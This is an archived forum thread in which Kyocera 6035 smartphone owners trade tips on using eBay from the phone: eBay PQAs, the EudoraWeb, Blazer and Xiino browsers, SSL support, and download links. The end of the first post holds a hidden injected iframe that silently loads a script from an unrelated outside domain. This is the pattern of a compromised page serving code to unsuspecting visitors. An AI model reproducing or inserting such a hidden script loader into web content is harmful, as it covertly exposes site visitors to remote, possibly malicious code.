+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Ebay Access.

julie123

Ebay Access...

HI,

I SPECIFICALY PURCHASED THIS PHONE SO I COULD ACCESS EBAY FOR SELLING PURCHASES, ETC. AFTER TRYING TO SET UP, ALL I GET IS WEB PAGE UNAVAILABLE AND SOME READING BETWEEN THE LINES THAT IT WILL NOT BE!!! IT COULD BE ME BUT IF IT IS NOT, I WILL BE REALLY MAD (considering I didn't want a phone at all). I AM WITH SPRINT AND AOL------ANY INFO WILL REALLY BE APPRECIATED!!!!!

SUPER THANKS,
    JULIE<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Registered User All-Purpose Guru's Avatar

Re: Ebay Access

Originally posted by julie123
    [B]HI,

I SPECIFICALY PURCHASED THIS PHONE SO I COULD ACCESS EBAY FOR SELLING PURCHASES, ETC. AFTER TRYING TO SET UP, ALL I GET IS WEB PAGE UNAVAILABLE AND SOME READING BETWEEN THE LINES THAT IT WILL NOT BE!!! IT COULD BE ME BUT IF IT IS NOT, I WILL BE REALLY MAD (considering I didn't want a phone at all). I AM WITH SPRINT AND AOL------ANY INFO WILL REALLY BE APPRECIATED!!!!!

SUPER THANKS,
    JULIE
    First off, if you have access up and running, there's an EBay PQA that I've been using a lot to do searches. I've never used it as a seller, but it's 160k so it should have a lot of features (that's huge for a PQA.) Try www.palm.com to find it-- they have a PQA archive there. LIke I said, I haven't tried to use it for selling-- but it's pretty good for the limited usefulness I've used it for.

Lastly, I was going to introduce you to the capslock key-- but your parenthetical comments being in lower case tell me you just like yelling. Hard to understand someone when they're yelling, and in a forum, hard to understand someone WHO WRITES IN ALL CAPS. (so it really *is* like yelling.)

Ta,

--apg
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

Also you may need to upgrade your browser on the phone.

The stock Eudora browser doesn't come with SSL (Secure Sockets Layer) which allows for secure connections.

Or you can get the Blazer Browser, it also does good on showing pictures.

But if your having trouble connecting to the secure areas of a website or one that uses cookies then you should update the browsers, even if you don't, do it anyway!
    Remember, When the long night comes return to the end of the beginning.

Administrator
    i tried to use the ebay pqa and put up a bid.. it never worked...

with all that space it takes, it does not do anything extra.. its a complete waste of space. :

I have bid on several items using the Ebay Pqa, and won them......It works for me!!!:eeek: :d
    Fully converged since 2001.....QCP6035, then KWC7135, XV6700, and now XV6800. Wife SCHI760. Resistance is FUTILE!

verbenaman
    Also..

There is a pqa called "bidtransmit"..I use that on
    my 6035 all the time and works great.

You can check them out at

http://www.bidtransmit.com

Can't bid on Ebay via 6035!!!

Has anyone recently been able to place bids on EBay via their 6035??

I use to be able to, via the blazer browser, but recently it has been a nogo.

I can pull up an auction either by searching or from my watch list. I can then enter my bid amount and tap on "review bid" and then a new screen comes up that says "Review Bid" but there is no other information and nothing to tap.

I've also tried using the EBay pqa which is a piece of junk! I continually get error messages like "internal error 500" or "software error. go back and retry" etc etc...

If anyone can actually place bids on EBay via their 6035 please let me know how....

what about the WAP browser?
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

you can bid on ebay via any web capable phone

I just placed a bid and won on Ebay today, from my 6035, using EudoraWeb, from the airport, right before boarding the plane... kewl...

I didn't try Blazer... EudoraWeb seems faster for this kind of stuff.

Originally posted by monkeyboy
    I just placed a bid and won on Ebay today, from my 6035, using EudoraWeb, from the airport, right before boarding the plane... kewl...

I didn't try Blazer... EudoraWeb seems faster for this kind of stuff.
    What web address did you use?

I tried EudoraWeb but when I tried to search for an item it said "two items found" like it was suppose to, but then didn't actually list the items...

It was also confusing because it looked like it was trying to go to the regular ebay site....

Isn't there a special one for phones?

I have an Ebay pqa on my 6035, but I can't remember where I downloaded it from a long time ago. Possibly ebay. But I can't find it online anymore. It looks and feels like an official ebay product.

In info, it is listed as "ebay v. 2.04" and it takes up just 24K.

When you tap on the pqa icon, it has an official looking ebay logo, and the following links: a keywords search, "Browse by Category", "Completed Auctions", & "My eBay". Further in, there's even "Register for eBay" and "User Agreement" links.

I have used it a lot and have easily won auctions with it, but I don't think you can set up something to sell on it. But you could monitor what you are selling.
    ~'kito
    pdaPhoneHome Moderator

Administrator
    palmgear.com is where i founf the one i used...

I had searched PalmGear and couldn't find mine (v. 2.04). All I saw was several with v. 1.xx and this one had no screenshot and takes up a whopping 164kb of RAM, compared to my 24kb. Wish mine were listed there. I wonder if mine was from ebay.com, and they eventually removed it so that they could sell the mobile phone version with a hefty service fee.
    ~'kito
    pdaPhoneHome Moderator

>> What web address did you use?

I tried EudoraWeb but when I tried to search for an item it said "two items found" like it was suppose to, but then didn't actually list the items...

It was also confusing because it looked like it was trying to go to the regular ebay site....

Isn't there a special one for phones?
    >>

I used www.ebay.com and yes I think it was the "regular site".
    It seemed to work fine, the only problems being that the formatting is a little funky and certain nav buttons didn't work, like "My Ebay", presumably cuz they use Javascript or something.

But I got search results fine and could bid, presumably using EudoraWeb's SSL support. And it was sure neat to see the "You won the auction", while seated on the plane, after a last minute bid via the 6035...

Administrator
    the XIINO web Browser supports java.. have you tried it yet? its a pretty good browser!

Don't know how many people will benefit from this but I found this app for those of you who sell on ebay.

http://www.freewarepalm.com/database/ebayseller!.shtml

just use this url in blazer

i'm still looking for KT1.1.19 if you have it webmaster@voicesinmyhead.net

Ebay PQA

As a few people have asked me for this, I'm posting the link for download here, it's buried deep in the ebay system, but here it is anyways: http://pages.ebay.com/anywhere/PDAs.html

Jorge

It seems to be Palm VII specific. Does it work with the 7135?